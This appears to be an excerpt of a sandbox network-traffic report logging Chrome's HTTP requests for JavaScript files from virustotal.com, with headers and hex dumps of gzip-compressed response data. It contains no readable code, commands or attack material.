                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 2f 43 2c 6a a5 e2 f4 ea b1 4a 26 71 b0 4a 23 88 15 2c 61 10 9e 04 b3 66 23 e2 a6 8d e1 30 bd 5a a9 68 e6 9c aa d9 02 7d ef dc 69 18 10 2a 75 de 54 4d a2 d8 4f 55 2b 1e ea e6 59 51 06 ef 89 5a 40 80 ce 30 99 26 b9 06 b7 dd 3d f1 ef 0f 3b 27 7e bb dd 6a 46 e0 04 ff 6d eb ce 9d 66 3c 6c d2 2a 22 70 c5 20 b9 4f 1f 00 23 98 66 c0 1f 5a ad 8f 1f e3 96 a1 14 ea ef dc 89 ef dc d1 ab 9c aa 59 10 2a b3 4a dd cf 8d b7 cc e8 e3 74 38 59 f8 49 e2 80 26 2a 9c 26 ce c8 5b fe b2 61 b9 19 af 27 84 8b d6 26 59 03 3f 4d cf f3 32 9e 68 b9 c4 25 5e 80 76 c3 0b 6f 16 2c 58 ec e9 c2 e4 34 ba 7c ac b0 8b d4 43 70 fa 7b 35 fc a2 2b 35 93 68 75 75 1e 45 8b 34 58 9d 63 ba 61 e3 11 0a 9c b3 67 0f 7b fd 03 27 8d 9c c9 22 58 8d 23 3f 9e 82 ec 34 3c b8 2f 48 af ce 81 f7 61 83 e6 28 14
                                                                                                                                                                                                                    Data Ascii: /C,jJ&qJ#,af#0Zh}i*uTMOU+YQZ@0&=;'~jFmf<l*"p O#fZY*Jt8YI&*&[a'&Y?M2h%^vo,X4|Cp{5+5huuE4Xcag{'"X#?4</Ha(
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: e7 d6 4e fb 0c b2 b0 5e 76 6c f5 79 5b 0a 89 46 b7 7b de 9e 58 85 5e 9f 4a 34 a7 8e 6a 33 2f 0b db 14 18 9a 65 e2 87 74 e4 a7 08 ad 41 01 29 c6 6f 66 bf 8c 82 a9 34 17 03 e5 95 65 97 b4 06 0d c8 5e 68 64 26 51 30 43 dd 4b 11 76 4d 4b d8 9d 82 04 a7 16 09 68 31 a4 51 88 77 12 d2 c6 2c 02 a9 b4 62 32 8a 86 5d 45 2b d1 95 c6 eb d1 aa 55 97 df a4 79 73 c5 9c 46 ab 5a ad 7c 8e bd 2f 36 fc 34 52 09 91 9a 8d 49 b2 32 08 d0 58 dc 0b 63 60 ae e1 9b 5c 39 c6 46 86 13 89 78 87 a3 6d 7d 76 2f 1a c6 58 d0 fb ac aa ed 0b 52 af 60 66 10 1a 6a ad fd 12 2a 74 9b df 1b 13 ec ea 24 c0 41 bc 0e 1d 98 1c b4 37 1d 04 7b fe 92 3a ab 38 7a 1f 4c 55 e6 14 58 98 f9 d4 05 1b a3 83 09 bf 63 47 32 ad b4 e5 26 78 2c 34 bc c1 9c 2a 22 58 cf 67 ec 12 ad 5d ca 7e f2 c7 8f 96 a4 a9 3a ca
                                                                                                                                                                                                                    Data Ascii: N^vly[F{X^J4j3/etA)of4e^hd&Q0CKvMKh1Qw,b2]E+UysFZ|/64RI2Xc`\9Fxm}v/XR`fj*t$A7{:8zLUXcG2&x,4*"Xg]~:
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC485INData Raw: d5 30 82 89 39 45 9e 58 61 03 e2 18 08 51 2e 3a cc 85 41 3a a2 83 fa a4 c5 2e 68 d5 16 a8 6b 5a 6f 19 80 80 c1 24 c0 79 8e de 94 96 0f 6c b8 5a 1f 00 80 08 bc 6f 8b 54 3d 0b 7e 2d ed c6 84 4b 2c 36 fd 05 3d 7f 11 f2 59 02 b4 60 7f 66 d2 d4 6a 90 6d c0 8a fc d3 3b 72 44 33 d9 96 d1 95 37 3f 87 bf bf 84 25 fc 2b 82 e0 0b 45 c0 15 d0 4b 3d 76 b0 e7 d3 20 46 e2 5b 02 0d 0d f6 a4 7f 58 4b cd a4 c0 5a cd 2b ac e6 95 ac 66 bd 00 6d 17 01 7e f1 8e b3 64 47 5d c9 3d 6e 79 0f 9d 20 59 18 54 62 84 60 a9 5e c7 8f 71 5c 5d 80 73 46 c0 8c d8 52 48 12 1c ca 8d 60 fb 2a ec 1a fc 86 dd ff 79 9d 53 4c d5 a0 c5 e3 68 8e 4f 9a ad 88 29 02 9a 6c bc 68 4f 03 79 1a 0d 3b 80 cb d3 97 da d4 08 94 8f 1f 1b 34 09 38 73 b9 ba b9 35 ac d1 1a 7e 7a 01 26 af 50 01 79 3f 44 16 8b 0a df
                                                                                                                                                                                                                    Data Ascii: 09EXaQ.:A:.hkZo$ylZoT=~-K,6=Y`fjm;rD37?%+EK=v F[XKZ+fm~dG]=ny YTb`^q\]sFRH`*ySLhO)lhOy;48s5~z&Py?D
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a af 0d 0a 30 30 30 30 30 30 30 31 0d 0a 10 0d 0a 30 30 30 30 30 30 30 31 0d 0a c0 0d 0a 30 30 30 30 30 30 30 31 0d 0a 40 0d 0a 30 30 30 30 30 30 30 31 0d 0a a2 0d 0a 30 30 30 30 30 30 30 31 0d 0a 07 0d 0a 30 30 30 30 30 30 30 31 0d 0a b4 0d 0a 30 30 30 30 30 30 30 31 0d 0a 23 0d 0a 30 30 30 30 30 30 30 31 0d 0a 2f 0d 0a 30 30 30 30 30 30 30 31 0d 0a fe 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 2d 0d 0a 30 30 30 30 30 30 30 31 0d 0a a6 0d 0a 30 30 30 30 30 30 30 31 0d 0a e1 0d 0a 30 30 30 66 66 32 0d 0a f8 c8 ee 6c d0 c8 25 cb 3c 33 5e 18 fd 3b 45 3f 0d 65 8b 7e 9b 58 19 42 3c 8d 80 82 8b f9 4f 60 e0 9f b7 c3 00 65 8f dd 06 03 1c 84 12 06 e2 8f 9f bb 28 9a af b2 28 a6 6c 3d 9f 99 ec 93 68 0c 5d
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000000100000001@00000001000000010000000100000001#00000001/000000010000000100000001-0000000100000001000ff2l%<3^;E?e~XB<O`e((l=h]
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 70 bd 1c 23 8c 94 dd 57 ae a5 51 79 3c 08 08 eb 84 d4 da 80 90 20 77 b1 3b 6b ce 49 ad 46 30 50 a2 a7 c1 07 dc 7c ed 91 e6 d2 bc 3b 47 aa 99 ce 11 a0 b6 c6 5d 0c 2e 2e 54 ac f9 1b 96 08 32 2a 9a 3f e1 58 76 80 7b 10 b0 80 f8 e0 de 23 91 b2 6d fc 94 0f 66 27 1c dc 34 18 0f 54 b4 13 02 5c 64 8d e9 4e 91 0c 8a cc fa 2a 10 06 c4 1b 2c 17 bd 3a ba 27 01 d0 0b f6 8b 7d ff cf ba 16 28 6b 22 03 a2 b5 e5 9c 7a 24 b6 d1 a9 3f 2b 73 35 b5 50 c4 b7 31 8c f4 b7 93 2c 4d 0a 03 75 c3 a6 40 8a bf c1 d4 12 08 33 ec fe 7c 0a 3a 9c 61 71 9c c9 97 2b 03 22 ee c3 38 f6 af 72 92 bd 49 df 6e 6f 9d 14 a8 73 0d c5 2c b8 f1 7a 2c c9 77 89 79 e1 8a 29 cc 67 a3 0a 32 b3 42 21 f8 1a 2c a6 38 50 78 d3 79 eb 86 48 6a ce fe ee be a5 17 28 3c 5c c3 c7 45 c8 7f 06 53 5c de c7 33 14 92 20
                                                                                                                                                                                                                    Data Ascii: p#WQy< w;kIF0P|;G]..T2*?Xv{#mf'4T\dN*,:'}(k"z$?+s5P1,Mu@3|:aq+"8rInos,z,wy)g2B!,8PxyHj(<\ES\3
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 16 b9 c7 c2 49 ae 26 87 c0 ce 03 30 27 e5 37 cb 20 ec 69 04 5a b5 97 20 12 8a 82 8f cf 74 ca 2e bc 6d 04 79 e9 5d 15 96 69 e2 9d da fb 4c df 4f c0 63 81 68 85 5f 9a 12 fc 57 f8 60 4a ee 99 bc bf f5 2a 9a ea e7 27 e5 0a 14 c2 e8 76 5e 64 69 77 05 20 d6 80 12 94 f4 53 42 14 0a b2 bd ac 98 c8 16 ff bf de 67 35 9a 2a 07 79 f7 16 80 16 13 43 c2 64 45 e8 b3 32 72 de b2 3d a0 51 69 bd 4d 61 38 3b 0b 04 e6 cc 5d c3 d8 3e 61 c8 df c9 d8 da 1f 9d b6 f1 10 e0 87 eb ad 86 3f d8 60 02 8b 97 36 dd b5 b0 15 0c 9a eb 4c 25 23 5f e8 0a 9f 31 01 b4 fd 40 96 00 df af 63 41 03 47 9c 6f 02 37 1b 41 34 41 e8 49 f9 cb 86 fb 13 5c 73 95 3c 90 08 d9 50 36 06 3c db 01 7c 55 ec 18 d6 d2 88 58 c8 0b 55 ac 32 a0 05 3f 69 48 7e d7 01 c3 c1 08 a0 e1 a0 66 b6 27 ab b4 49 4f fa c5 d0 7a
                                                                                                                                                                                                                    Data Ascii: I&0'7 iZ t.my]iLOch_W`J*'v^diw SBg5*yCdE2r=QiMa8;]>a?`6L%#_1@cAGo7A4AI\s<P6<|UXU2?iH~f'IOz
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC50INData Raw: 81 c1 92 29 e6 05 d7 e2 5d 15 59 a0 46 b1 90 d1 5e 01 5f 91 2b 48 74 4d 47 5b 12 93 f7 23 92 38 13 f7 99 88 af 95 cd 99 fc 6d e7 02 5a 5b 55 14 0d 0a
                                                                                                                                                                                                                    Data Ascii: )]YF^_+HtMG[#8mZ[U
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a cf 0d 0a 30 30 30 30 30 30 30 31 0d 0a e3 0d 0a 30 30 30 30 30 30 30 31 0d 0a f5 0d 0a 30 30 30 30 30 30 30 31 0d 0a 94 0d 0a 30 30 30 30 30 30 30 31 0d 0a f9 0d 0a 30 30 30 30 30 30 30 31 0d 0a 25 0d 0a 30 30 30 30 30 30 30 31 0d 0a b3 0d 0a 30 30 30 30 30 30 30 31 0d 0a 44 0d 0a 30 30 30 30 30 30 30 31 0d 0a b4 0d 0a 30 30 30 66 34 39 0d 0a e0 c8 ac 30 7a f8 19 5c 01 fd 22 16 75 66 ad 57 ad e9 5b 03 43 98 85 07 d9 d6 a9 e8 36 92 06 ce 3e a6 82 92 36 ff d7 02 08 cd 61 e9 93 67 ad 6d 5d db fc 95 01 32 6f c0 88 e0 4a 1f f1 9b 8c 11 c7 78 d0 9e 5a 9b a3 fc c9 00 97 50 17 98 d1 31 de 00 56 2e 00 fc 9f ff ed e8 9b f0 16 0c c5 f1 60 4f d2 b1 1d 0f 7b 0d 2c 92 ad 42 c7 3e c5 17 70 b8 9f 30 6e c7 e9 c2 2f ce 19 25 5f c8 ae ce c6 1b
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001%0000000100000001D00000001000f490z\"ufW[C6>6agm]2oJxZP1V.`O{,B>p0n/%_
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: db a0 1d 03 42 51 8f 7e 4a 08 28 8d 34 ee 4c d5 58 8b 2a 41 42 a9 c1 f1 f1 c4 9f e9 85 66 88 28 b5 99 f5 27 87 c7 9a f5 0c 32 4a 4d d4 91 7f e8 eb dd a3 11 52 6a 61 8b 29 e6 08 1d 15 c9 16 6d 8b 20 31 93 78 1b f5 fa d8 5e e6 97 2c 96 05 6c b6 3f b1 45 35 aa c4 f6 c4 39 25 c2 b8 71 80 38 6e 43 f2 6e 9c 33 94 d1 97 89 36 5c e7 34 42 34 2c 32 ff 3e 8e fd 59 ea 3a cf 14 be bd 94 4c 66 d7 79 18 c3 f4 77 f1 0e b1 19 45 a6 e4 a1 b3 03 d7 7c e4 47 c8 95 d2 23 67 b5 d2 e3 22 c6 57 43 c2 a5 1d 50 36 1f 1e 8a 6a 9b 82 26 e2 15 53 75 e1 3a 58 9e df 34 2b d3 6b ec 78 5d 7c d9 6d 7d 15 f2 1b 44 4b 52 46 34 03 54 7f 2e 9c c3 5e e9 c0 61 b9 6e ac 96 e5 91 cc 61 15 b6 be 55 55 48 2d e8 7a 46 bf d1 fc da 09 85 2e 84 72 d5 bc 9e 9f d2 08 71 f6 20 52 49 00 ee ef 5b 63 8e 49
                                                                                                                                                                                                                    Data Ascii: BQ~J(4LX*ABf('2JMRja)m 1x^,l?E59%q8nCn36\4B4,2>Y:LfywE|G#g"WCP6j&Su:X4+kx]|m}DKRF4T.^anaUUH-zF.rq RI[cI


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    114192.168.2.164986574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC689OUTGET /gui/98738.02d0b9fc2f580f85da17.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 82d663f4d32dbdda4c3cc864e3caef9e
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:40:17 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:40:17 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36910
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 66 66 62 0d 0a 00 00 00 02 ff cc 5c 7b 77 da c6 b6 ff ff 7e 0a 95 f6 e4 40 97 24 03 36 60 70 70 9a 38 4e 9b b5 92 38 cb 76 ce 5a a7 3e 5e 54 48 03 a8 16 12 95 84 1f 25 7c f7 fb db 7b 66 c4 48 60 a7 cf 7b 6e 68 31 cc 73 cf 7e ef 3d 5b d4 96 99 b0 b2 3c 0d fd bc 76 54 cf 44 34 71 ef c4 78 e1 f9 37 27 b3 65 7c 73 9b 8f 96 e1 68 ee 85 f1 f0 89 be cf 9f af ae 1b ee 62 99 cd ea 57 57 fd c3 de fe e1 b5 bd e2 bf 83 7a 6e 0b 3b 6c 0c 8f 57 b7 5e 6a 25 c3 b0 de ee 75 3a fd 86 9d e1 e3 41 eb e0 a0 d3 b0 d3 61 3d ac b7 7a ad c3 86 1d d6 7b 9d c3 7e bf d1 b0 63 f4 f7 9a dd 7d
                                                                                                                                                                                                                    Data Ascii: 0000000100000001000000010000000100000010ffb\{w~@$6`pp8N8vZ>^TH%|{fH`{nh1s~=[<vTD4qx7'e|shbWWzn;lW^j%u:Aa=z{~c}
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: f3 77 61 7c 53 b0 81 c9 6d 9a 4f 99 15 66 f9 3c 6a d4 27 9f 3f d7 27 c3 5f 7e 7a ee 59 b3 54 4c 86 b5 6f 56 cd 75 0d 92 02 71 1c 02 0e 50 39 f0 d2 07 2b e5 95 9d 08 4b d7 ac 30 60 d1 70 4a 8d df 41 ba fc 1b b5 c0 b1 45 eb 58 cf f7 bc e3 9f a0 a3 ff cc 19 99 bc a9 f8 65 29 32 20 89 ce 77 06 bc 85 f1 54 ca 30 21 62 60 1c e8 01 07 7a f8 bd 07 fa 5b 61 df c5 25 1b d8 15 e5 2e 96 63 e8 22 29 bf ac 66 6c f1 84 a2 31 ce 3b c2 79 47 38 af f5 3c 08 6f 15 da 15 ee b9 01 e8 df ad 62 62 91 df 25 e9 cd 28 4a 7c e6 d1 92 72 79 f6 2c 77 c3 e0 85 b1 cf 0d f6 b9 e1 7d 6e 73 67 19 3a 8b f0 36 c9 35 9f c4 de 5c d4 2c 77 07 07 f1 b0 9a 55 42 b0 05 65 e3 39 d2 a4 b1 14 6b ae 33 db 89 c7 98 17 0b 56 32 f6 3d b6 9e ab 6f cb f8 81 84 c2 5a a8 0f 7a d2 f3 bd f2 00 cc 00 3a 34 bc
                                                                                                                                                                                                                    Data Ascii: wa|SmOf<j'?'_~zYTLoVuqP9+K0`pJAEXe)2 wT0!b`z[a%.c")fl1;yG8<obb%(J|ry,w}nsg:65\,wUBe9k3V2=oZz:4
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: f9 94 46 8c c4 bb b1 e7 c6 20 90 2b 25 1c ba 6e e1 af 64 88 54 36 82 93 26 66 9e 04 5d e1 7c 6a 65 a9 3f 64 b5 9d 0d f6 f6 90 3c 4c bd a9 70 a7 49 32 8d 84 b7 a0 24 77 32 87 92 e5 e3 ed 71 56 c0 f2 22 64 22 de 48 b8 0d 4b c7 4a 1a 8b 3e 9e 23 60 9c 8f a0 6d d4 e4 8d 4a 36 a9 a1 30 e2 06 f0 c2 67 5a 75 6a a5 28 77 75 15 76 4a 94 7a 07 f4 bc fb 7d e8 b1 70 35 40 19 51 c6 95 93 4c 26 19 7c fa c2 b4 e8 5c 87 ef 4e a3 64 2c c8 76 bc 25 52 69 2f e7 7d 32 06 b2 ff 15 8a 3b c3 d1 91 19 70 c3 f7 7b 09 b0 5e 32 58 92 10 4c 1b 99 98 73 e4 a9 9c 39 2f e4 80 8d ac 17 50 4a fe 8d d0 19 28 f2 bd f9 fb c9 8c fc c1 a2 59 f9 2e e3 24 45 ea d5 91 4e 87 15 c0 6d 4f fc 1b 22 09 31 48 16 25 a0 13 7c 1b b8 62 0e 73 88 ea 41 ff d3 29 d7 0d 0a 3c 85 8c 92 49 91 04 36 f6 80 5f b4
                                                                                                                                                                                                                    Data Ascii: F +%ndT6&f]|je?d<LpI2$w2qV"d"HKJ>#`mJ60gZuj(wuvJz}p5@QL&|\Nd,v%Ri/}2;p{^2XLs9/PJ(Y.$ENmO"1H%|bsA)<I6_
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC295INData Raw: 71 e6 2f c2 21 1d 00 2b e5 40 34 2b b8 5f e1 11 e5 91 94 ad 9c 91 02 5f af 8f 7e a8 5f 41 c9 c4 28 01 93 45 9e b8 1e a2 4b a0 c1 05 ca 02 e3 e9 ba 71 6d ff 48 7d 88 bc d1 8a aa 2e 32 7b f0 a9 88 9e 35 5b 63 5d 2f 42 d7 0f 02 66 a1 32 89 3d f2 cd e8 1f 87 7a bc bf 44 42 69 7e 1a 09 aa 47 6d d4 6b d2 08 9a a1 1c 0c 14 e5 3d 6a b4 64 63 6d 73 b9 ec 8e 92 df 4e ef 00 35 bd 54 f2 eb c6 f5 84 0a 7e c3 7a f7 b0 4f 05 b9 28 f3 45 5b 0a a8 ea b8 70 6a 1c e1 a8 5c 46 4c 42 6d d7 5c 95 62 a1 dc ca b1 85 2a 54 7d e7 64 ad fe 13 5b 16 4a 59 ef 07 56 d3 6a 59 87 70 0e 8e fe 13 af ff 13 57 a6 6c 6e 34 2a 33 3a 87 8f cc a0 88 bd ba 7c ab d9 79 6c f4 26 fb 59 9d d4 7f 6c 0e 4e a3 12 8e 15 98 7a 07 bb 77 81 7c 93 5f 21 53 84 d5 39 9b 5d e8 6e cf 89 65 81 55 e6 50 4e 06 95
                                                                                                                                                                                                                    Data Ascii: q/!+@4+__~_A(EKqmH}.2{5[c]/Bf2=zDBi~Gmk=jdcmsN5T~zO(E[pj\FLBm\b*T}d[JYVjYpWln4*3:|yl&YlNzw|_!S9]neUPN
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 65 0d 0a 30 30 31 0d 0a a4 0d 0a 61 39 30 0d 0a 51 c6 27 47 42 fd e7 c2 81 47 e7 8b 01 ae e0 09 04 de 8c 57 a0 5b b8 09 6c c2 c0 12 11 aa 66 70 21 c6 7d 9b 66 99 75 e5 c6 b9 77 ef 48 bf cf f2 bd c8 af b7 9a cd 7f 58 8e 75 00 32 37 14 98 94 5f b4 3c 1b 00 13 47 5a 5e e5 a0 61 0c cb 27 64 4e 4d 2d 99 e2 8a ce e1 ea ac 81 b5 c1 9a 71 88 3f 8c 33 e5 1e ea 9a b2 15 21 18 06 17 fb 11 7b b6 35 55 91 6c 46 fd 28 2c d8 8f c3 78 6d 73 45 f9 5f 28 2d ff dc fb f6 2b 6c fc ad f5 2a 49 72 14 40 7b 0b cb ba ed b8 fb 6e db aa 93 18 50 86 18 06 7f ac 7b c1 52 f3 bd 06 cf a0 f8 8a 11 63 b5 9b ad 96 d3 6e b6 f7 e1 68 0b 63 a5 97 cb 7c 86 5b 56 1e fd 2e c4 c5 60 06 8f 03 85 ab 60 b0 f7 6f 2f 8d 0d c2 7c b6 a4 b2 a9 f9 5e 7e 37 ce f6 8a dd f6 90
                                                                                                                                                                                                                    Data Ascii: 00000001e001a90Q'GBGW[lfp!}fuwHXu27_<GZ^a'dNM-q?3!{5UlF(,xmsE_(-+l*Ir@{nP{Rcnhc|[V.``o/|^~7
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1324INData Raw: 62 a4 12 a1 8c 6e 3c bd e7 e3 f1 50 49 49 c9 6a 46 af e2 2a 56 ff 06 ef 83 6b 40 77 85 6a ba 72 73 50 d3 1c 06 85 20 98 ae b1 d1 6d f2 23 34 eb d6 a8 30 2e 2f 63 fa c8 bc 8c 1e 50 59 48 8e 5b 7f 6b 7f 3b 18 c8 87 8f e8 13 cc a5 48 57 e3 04 58 0c 7f 25 4f 5c cd 42 cb fa bb 39 1e 44 f4 ea 78 58 71 82 47 36 f1 88 5f 00 c1 08 50 1d 43 45 c2 a4 25 90 85 a6 2e 11 fb 48 a0 cb b0 0f 4f 2c 23 df 87 3a ab 19 2a 83 60 50 b2 39 82 c1 d9 7a bd 8c 56 0b 3c 05 43 b8 8e c4 24 1f 10 e3 52 a3 8c a9 1d 3c 01 30 68 1e a9 2f 32 63 cf 66 0d 43 ac cd 28 d5 d1 5c 8f 57 6c 18 95 91 1b 27 11 a2 d6 35 97 d4 d8 2e ff 91 fd 6c 1d dd c3 5e 07 7b 79 78 88 98 2c 1c 53 a9 90 8c b2 6a 84 a1 2e f7 28 ba 43 7d c3 56 b3 4b 6c a8 49 d2 92 6b 6f c0 da 71 c5 ea a7 bc 9a 21 80 bb f4 64 03 73 91
                                                                                                                                                                                                                    Data Ascii: bn<PIIjF*Vk@wjrsP m#40./cPYH[k;HWX%O\B9DxXqG6_PCE%.HO,#:*`P9zV<C$R<0h/2cfC(\Wl'5.l^{yx,Sj.(C}VKlIkoq!ds
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    115192.168.2.164986674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC689OUTGET /gui/94571.68f95a2c314991f05e3e.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 5058d690aa3076f5b3b923e2f49b7da0
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:37:49 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:37:49 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 37058
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 31 0d 0a 8b 0d 0a 30 66 66 65 0d 0a 08 00 00 00 00 00 02 ff cc 5c 7d 77 da 46 d6 ff ff f9 14 aa da 7a a1 47 92 01 1b 30 38 38 75 1c a7 cd 9e bc 1d db e9 39 6d d6 c7 15 d2 00 8a 85 44 25 e1 97 10 be fb fe ee 9d 19 31 02 1c 6f 77 d3 f3 34 b4 b6 98 3b 2f 77 ee fb bd 33 b2 3d cf 85 95 17 59 14 14 f6 61 2d 17 f1 c8 bb 15 c3 99 1f 5c 9f 4c e6 c9 f5 4d 71 35 8f ae a6 7e 94 0c be 00 fb fc f9 c3 65 dd 9b cd f3 49 ed c3 87 de 7e bb db bc 74 16 fc bb 5f 2b 1c e1 44 f5 c1 d1 e2 c6 cf ac 74 10 d5 5a dd 76 bb 57 77 32 3c ee 37 f7 f7 db 75 27 1f d4 a2 5a b3 db 3c a8 3b 51 ad db 3e e8 f5 ea 75 27 01 bc db e8 ec 01 ee e3 b1 dd ea f5 1a 75 27 c6 e3 41 af d9 d9 ab 3b 01 8d 6a 77 0f 9a 2d 1a 76 d0 69 b7 f7 31 6c 48 7d 9b ed 3d 34 86
                                                                                                                                                                                                                    Data Ascii: 00000001010ffe\}wFzG088u9mD%1ow4;/w3=Ya-\LMq5~eI~t_+DtZvWw2<7u'Z<;Q>u'u'A;jw-vi1lH}=4
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 59 34 9e 14 b6 f5 e3 34 85 63 4a 6f 44 a6 fa 1f 3d d9 35 31 38 b2 40 80 a1 17 c4 e9 3c 7c ae d8 4d cb 12 fd 62 2f 1a 3d 67 a3 10 d6 a5 c4 43 ab 4e a4 ec 1c 97 a2 63 e8 b2 ec 24 85 cc b1 d7 a5 c7 86 a5 bf f1 c6 1f bd 7c 92 de aa 51 f5 3e d8 a7 e9 5f d5 0e 20 b1 26 a4 26 fd c5 ce 8e 58 d1 ff 41 e1 33 59 f0 1d 58 f0 dd df 91 05 e0 c0 c4 9b 4d d2 44 bc 9d 33 cf bf 02 f1 b7 50 e4 51 fa 47 7f 42 fe a3 9d 9d 68 45 ff ad da 6c d2 fe 0a b4 bf fa 9b d2 7e e6 89 30 2a 5e c0 c0 7d 25 c1 5f a3 c6 a3 74 4f ff 04 dd d3 9d 9d 74 45 f7 95 69 34 89 7d 02 62 9f fc 4d 89 3d f7 80 f3 73 76 30 30 53 5f 89 e0 44 86 87 a8 5c 87 21 72 13 e8 16 dc c4 24 cd a2 4f 30 2b 7e 6c d7 95 4f 3d 9f 0f 11 5a 98 61 82 65 7a ca ab 11 3c 5e 68 12 f7 25 88 fb 92 88 cb ce 04 aa 6b 76 4f 44 71 9b
                                                                                                                                                                                                                    Data Ascii: Y44cJoD=518@<|Mb/=gCNc$|Q>_ &&XA3YXMD3PQGBhEl~0*^}%_tOtEi4}bM=sv00S_D\!r$O0+~lO=Zaez<^h%kvODq
